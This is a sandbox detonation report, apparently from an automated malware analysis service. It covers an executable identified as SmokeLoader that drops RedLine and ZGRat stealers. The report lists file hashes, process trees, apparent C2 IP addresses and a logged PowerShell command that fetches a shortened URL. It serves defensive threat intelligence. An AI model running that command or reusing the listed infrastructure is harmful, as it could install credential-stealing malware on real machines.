Analysis Overview
SHA256
bf4e0ba12be5590ba80c2d595c166a8c2d36d6baf2770c8d1da20e64ea898367
Threat Level: Known bad
The file b67151e07936533f3b38355566e47650.exe was found to be: Known bad.
Malicious Activity Summary
RedLine
ZGRat
Smokeloader family
SmokeLoader
RedLine payload
Detect ZGRat V1
Downloads MZ/PE file
Reads user/profile data of web browsers
Deletes itself
Executes dropped EXE
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-18 21:46
Signatures
Smokeloader family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-18 21:46
Reported
2023-12-18 21:48
Platform
win7-20231215-en
Max time kernel
27s
Max time network
62s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5EB3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\72D0.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1232 wrote to memory of 2708 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5EB3.exe |
| PID 1232 wrote to memory of 2708 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5EB3.exe |
| PID 1232 wrote to memory of 2708 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5EB3.exe |
| PID 1232 wrote to memory of 2708 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5EB3.exe |
| PID 1232 wrote to memory of 2872 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\72D0.exe |
| PID 1232 wrote to memory of 2872 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\72D0.exe |
| PID 1232 wrote to memory of 2872 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\72D0.exe |
| PID 1232 wrote to memory of 2872 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\72D0.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe
"C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe"
C:\Users\Admin\AppData\Local\Temp\5EB3.exe
C:\Users\Admin\AppData\Local\Temp\5EB3.exe
C:\Users\Admin\AppData\Local\Temp\72D0.exe
C:\Users\Admin\AppData\Local\Temp\72D0.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\is-6T1TS.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6T1TS.tmp\tuc3.tmp" /SL5="$9011C,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231218214635.log C:\Windows\Logs\CBS\CbsPersist_20231218214635.cab
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| RU | 77.105.132.87:17066 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.237.62.212:80 | api.ipify.org | tcp |
| BG | 91.92.254.7:80 | 91.92.254.7 | tcp |
Files
memory/2144-0-0x0000000000400000-0x000000000040A000-memory.dmp
memory/2144-2-0x0000000000400000-0x000000000040A000-memory.dmp
memory/1232-1-0x0000000002D50000-0x0000000002D66000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5EB3.exe
| MD5 | 9a747219c8fab73e2ba0541e3d86cd8b |
| SHA1 | 0723a7c85108ebd6a8141a7ce2459c35add81a0c |
| SHA256 | eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01 |
| SHA512 | acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83 |
memory/2708-14-0x00000000002A0000-0x00000000002F2000-memory.dmp
memory/2708-19-0x00000000743B0000-0x0000000074A9E000-memory.dmp
memory/2708-20-0x0000000000D10000-0x0000000000D50000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\72D0.exe
| MD5 | 0cae0a0d054f11618d1ad67eb399f6ae |
| SHA1 | a094cb5ea7cba55f81a790fcda064cccd44e975b |
| SHA256 | f5f488eabcc59ddf49cae07715ea4eea2a1d480f227175e4ba4de3bf09ebb205 |
| SHA512 | 8191eed7841083837f180ff86076f29b79579b5433b06265678fffbdb4346cb301ac3e867a59c6c12bdc95d15a24c7d3e0a70285e6ea10fc4785b8009cc9f389 |
C:\Users\Admin\AppData\Local\Temp\72D0.exe
| MD5 | 636799f190571f763112612141cf8225 |
| SHA1 | bb06d7fa20c75a2fc6ca21bb8a080d5d9ae5ef91 |
| SHA256 | 4efe31676c00f7fa0c39b1785eb1b1091ab8200d4522d4cf37f87e8398b909ee |
| SHA512 | c1b2f120afa8bc315f22843f9e9e2383548cd59fe4c2320fa6a7c4f7a768482e1200d7ef213f8dab09662dc4a66a4882438e0a9b54589587107ae07c4d9fafdf |
memory/2872-27-0x00000000743B0000-0x0000000074A9E000-memory.dmp
memory/2872-28-0x0000000000A90000-0x0000000001882000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 889f316cc81ed54952528f3980ed0334 |
| SHA1 | f7479b182f9ae17141dc92f1f3650a1c495849b6 |
| SHA256 | eb2f26e0f7259a52df38c30d46b700c497498a55422fd0aafd7dc06e8ec321cb |
| SHA512 | d93cfd7214bdd651af757343fc6b9fd042a3a59fcb9841d7382efa29b1ce7838fa2a789719dade95283cc6429a22e51bac2b97c9bf33417333b4ac9b08d75097 |
\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | c97d74d9e49a75e8d165e18ae1d34377 |
| SHA1 | e6f0c01abf7c3f1efdd0d54055396657f376d80b |
| SHA256 | da0c66fa7319d07eba575212fa203019729ba7ec81a448ac772425e6813251a8 |
| SHA512 | a05dcbed03051c21ad2b3ba2415782d4fd15bc481427fc0dce863a3471c573c598b1b035035d28ba0164b7e8860574176c85169c830fbdd689b1ba8f174b3ebc |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 62b01ec4a955eab3a7a41e2c07f18913 |
| SHA1 | 48d8e1e391fa078d78e2130481f9d35eb45a11ec |
| SHA256 | c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56 |
| SHA512 | 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56 |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | 53604cef6dd756ae33440b38e66abee6 |
| SHA1 | c3cf1ba4e89cf136289c645109a55aa6e95a5621 |
| SHA256 | 02161a1d6ee0814f514184f5436e0b0e62e5d8c8cfbbe17c64c10689a85c42ad |
| SHA512 | 25282a06656aa3219479c499b94b79feaaf5af5c63b60bd773665d40d43b43e583680aa95e864aeeca358ca6be2e20ebbbeb3d3a3f9d5c8b57e8dd83ae787f48 |
\Users\Admin\AppData\Local\Temp\nsj7428.tmp\Math.dll
| MD5 | ebd8a7a5042ae1d4ce1aa9071859c851 |
| SHA1 | ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6 |
| SHA256 | fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837 |
| SHA512 | daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e |
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 06af250521d0acb84fa6b454dd3aa63f |
| SHA1 | b2326d895ae2893812f733c2c053a58bce4862a3 |
| SHA256 | bf6c43f30fb94de9d2d8a9b934f44a84fc7417f26c2ed7eaf18295ab3f8277c8 |
| SHA512 | 70edbf18c92f5bb4697968bb6c7172743de35aa03dfae1f758320540fb2e614e8359fca685ec491ddc99b07bf0e860e4649f150d7de7ea80da062e9f9e235370 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 96dfd842fc4b217272642561a2a335cd |
| SHA1 | fa92b3acb145c4881d161b31ea17d39e3096061c |
| SHA256 | b129a832b0e3bfb214081218c9f5be9e31165f31cd0861cb3d8117a59be40638 |
| SHA512 | c719222c4e91d7b8dbf104ae1e15aab95d32736347e3a21811d4786875c84f4db2d98ab373bf429cd5fa517650f03375a80c5582e95fb9d20c150da6a7a2b298 |
memory/2736-61-0x0000000002690000-0x0000000002A88000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | e33bba019d201b53c0f1c841b95ab085 |
| SHA1 | 962622858a20099b64b1fc7270688037175f6210 |
| SHA256 | 7a2b624432901140afa0ed9b8278f6cca9c128590648deb78ef4dbf139cc2e5a |
| SHA512 | b0b288418c52607c588eb04ff04d1cbdc63a4ab582e33000f90324a315dc9363aee9bc866cb0d795734a9d23bb03d56674255db864ffc90053d5b53af40ba0bd |
\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | b667ff1da7f629bd935c8407579a52f4 |
| SHA1 | cee70ebefa24ea5b50b972150072cab5db289193 |
| SHA256 | 4dfac721e92de3b8f617e71fb3aa251c9ae4361cc50afb236209cb09d46f8be6 |
| SHA512 | 8f3224cc671f3067454d22f8016e278824422b8cfea941d23cbcff0c36ce58fb8845f4a45de283ae38ec72c703fe3e90ecbfcd97d76aa74c24cff976c47cdb95 |
\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 78fa75e60321eacdd9f62e5fd8a85bd8 |
| SHA1 | 14e32b8fe16636ea249b84cde2f48e6d6ac061e3 |
| SHA256 | 88fe5388b1ee99b474293262535063f3e11dff8068e20ebfff3b5eaf3efdb1d7 |
| SHA512 | 8893755937ca6bcbe03b589de6743e7bdfa813f92ce6254ccd2f8b2531df543557b8fd690245d8af5e8c11f79435e1b330ad2a657336e5edbc918bdf3a810863 |
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | be3d7299879e5e5371b982768403214c |
| SHA1 | a1375c79c51280edd30f37389b0b93d973069ee4 |
| SHA256 | 91c015f6c836d5f47f0fdc67cf38aca7f96f7f9ca14b1a33be20d73f8f25f874 |
| SHA512 | 325cbdf243a65999e434df5bcdc9b76a3b2b15766f6ebab550608d6a4205802b6e3200bbab2da5cc5e4b7a376ca4e72aa3cba408de5bf1b1f75f2b21077e51e2 |
memory/2944-72-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2672-73-0x0000000000220000-0x0000000000229000-memory.dmp
memory/2736-76-0x0000000002A90000-0x000000000337B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 09a78f0f02a8c8dbc91b2be03742f82b |
| SHA1 | c02e782c481eeda8d19687afc165bad0eb26e8cc |
| SHA256 | 26ef9ace8c6489bad88664897a76a958d49e46f1d0bc93e4acdbbf09fc415674 |
| SHA512 | 1a3a2f88d5f6315a13fb86d18afaead04e0f121e23ee165e1bb229a75c547a4856b02ef38ae7324c6a6e4ab117aa56662284fdc878b6f85350be018a8844a776 |
memory/2736-87-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/2944-88-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-6T1TS.tmp\tuc3.tmp
| MD5 | f448d7f4b76e5c9c3a4eaff16a8b9b73 |
| SHA1 | 31808f1ffa84c954376975b7cdb0007e6b762488 |
| SHA256 | 7233b85eb0f8b3aa5cae3811d727aa8742fec4d1091c120a0fe15006f424cc49 |
| SHA512 | f8197458cd2764c0b852dac34f9bf361110a7dc86903024a97c7bcd3f77b148342bf45e3c2b60f6af8198ae3b83938dbaad5e007d71a0f88006f3a0618cf36f4 |
\Users\Admin\AppData\Local\Temp\is-AN06R.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
\Users\Admin\AppData\Local\Temp\is-AN06R.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
memory/2128-113-0x0000000000240000-0x0000000000241000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-AN06R.tmp\_isetup\_isdecmp.dll
| MD5 | 3adaa386b671c2df3bae5b39dc093008 |
| SHA1 | 067cf95fbdb922d81db58432c46930f86d23dded |
| SHA256 | 71cd2f5bc6e13b8349a7c98697c6d2e3fcdeea92699cedd591875bea869fae38 |
| SHA512 | bbe4187758d1a69f75a8cca6b3184e0c20cf8701b16531b55ed4987497934b3c9ef66ecd5e6b83c7357f69734f1c8301b9f82f0a024bb693b732a2d5760fd303 |
memory/2336-99-0x0000000000240000-0x0000000000241000-memory.dmp
\Users\Admin\AppData\Local\Temp\nsj7428.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | 4291815e0de7498614bcf21ca722551a |
| SHA1 | a2b63bba1e986b405bafc8c164056467d80ea919 |
| SHA256 | d60518795a083c0a841f4ddfe6cc4212d17a0d1a84267b576ea1fb7245f86dd7 |
| SHA512 | 4c0fad37f9ccb76fc03dfa4267864cbd3c6ced7b3e092984ef2e4f8c36cb4845f76e328e67a89934cf2605aa51509b176b36f387a0e32c3767deb4b980dc1766 |
\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | afbe2cfdbbb1f4659c3edad94e9118e7 |
| SHA1 | ae53369f974ae091f0b0cf717ffac022be25a173 |
| SHA256 | 64f492ce2a41599af7f31ff186f0fb09b574a049acabfb3b06bb6fa84addcb39 |
| SHA512 | 1ccb302c26b950490b35ad5781c2cd4bac9335a9b8ad305e022dff330a720579421c8344a825a037a0af1e55236fe5f5a6721bb7b7fd142bbdc78e71c040cda1 |
memory/2944-80-0x0000000000400000-0x0000000000409000-memory.dmp
memory/2736-77-0x0000000002690000-0x0000000002A88000-memory.dmp
memory/2872-74-0x00000000743B0000-0x0000000074A9E000-memory.dmp
memory/2860-71-0x0000000000400000-0x0000000000418000-memory.dmp
memory/2672-70-0x0000000000970000-0x0000000000A70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 67f5e9888d53bd6520c2a5ec6ac50aed |
| SHA1 | 053cee76df8f08bbb9df3fcca13267fa087eba5f |
| SHA256 | c7d88978391a30d55da04d925ed25df35ed798c358669473f988406aada23dc5 |
| SHA512 | 556b7d383ee93d89a5bc828848af045889ce255f325029af728181254c27f635a14589c61840b52f8b1a4cfa04bd04267bff5677dc4ec8a6847efc3d5d577509 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-18 21:46
Reported
2023-12-18 21:48
Platform
win10v2004-20231215-en
Max time kernel
38s
Max time network
105s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
ZGRat
Downloads MZ/PE file
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9CFB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C7C5.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9CFB.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3440 wrote to memory of 2492 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9CFB.exe |
| PID 3440 wrote to memory of 2492 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9CFB.exe |
| PID 3440 wrote to memory of 2492 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9CFB.exe |
| PID 3440 wrote to memory of 5092 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C7C5.exe |
| PID 3440 wrote to memory of 5092 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C7C5.exe |
| PID 3440 wrote to memory of 5092 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C7C5.exe |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe
"C:\Users\Admin\AppData\Local\Temp\b67151e07936533f3b38355566e47650.exe"
C:\Users\Admin\AppData\Local\Temp\9CFB.exe
C:\Users\Admin\AppData\Local\Temp\9CFB.exe
C:\Users\Admin\AppData\Local\Temp\C7C5.exe
C:\Users\Admin\AppData\Local\Temp\C7C5.exe
C:\Users\Admin\AppData\Local\Temp\D469.exe
C:\Users\Admin\AppData\Local\Temp\D469.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\D91D.exe
C:\Users\Admin\AppData\Local\Temp\D91D.exe
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c install.bat
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\is-KBMR3.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KBMR3.tmp\tuc3.tmp" /SL5="$1C0022,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
